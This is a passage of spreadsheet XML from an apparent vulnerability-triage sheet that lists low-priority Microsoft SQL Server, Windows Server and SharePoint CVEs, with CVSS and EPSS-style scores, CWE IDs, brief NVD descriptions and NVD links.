      <c r="K379" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S379" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68778</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68779</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K380" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S380" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68779</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68780</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K381" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S381" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68780</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68781</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K382" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S382" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68781</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68784</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K383" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S383" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68784</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68898</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K38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84" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S384" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows iSCSI allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68898</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69267</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K38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385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q385" s="5" t="inlineStr"/>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="S385" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in Windows Connected User Experiences and Telemetry allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69267</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69297</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K386" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L386" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q386" s="5" t="inlineStr"/>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>CWE-257</t>
        </is>
      </c>
      <c r="S386" s="5" t="inlineStr">
        <is>
          <t>Storing passwords in a recoverable format in Windows DHCP Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69297</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69374</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K387" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L387" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q387" s="5" t="inlineStr"/>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S387" s="5" t="inlineStr">
        <is>
          <t>Allocation of resources without limits or throttling in Windows SMB Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69374</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69409</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K388" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q388" s="5" t="inlineStr"/>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="S388" s="5" t="inlineStr">
        <is>
          <t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69409</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69497</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K389" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q389" s="5" t="inlineStr"/>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S389" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69497</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69636</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K390" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q390" s="5" t="inlineStr"/>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S390" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69636</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69781</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K391" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q391" s="5" t="inlineStr"/>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S391" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Client allows an unauthorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="T391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69781</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69839</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K392" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q392" s="5" t="inlineStr"/>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S392" s="5" t="inlineStr">
        <is>
          <t>Uncaught exception in Windows iSCSI Target Service allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69839</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70019</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K393" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q393" s="5" t="inlineStr"/>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>CWE-65</t>
        </is>
      </c>
      <c r="S393" s="5" t="inlineStr">
        <is>
          <t>Windows hard link in Windows Compressed Folder allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70019</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73029</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K394" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q394" s="5" t="inlineStr"/>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S394" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73029</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76968</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
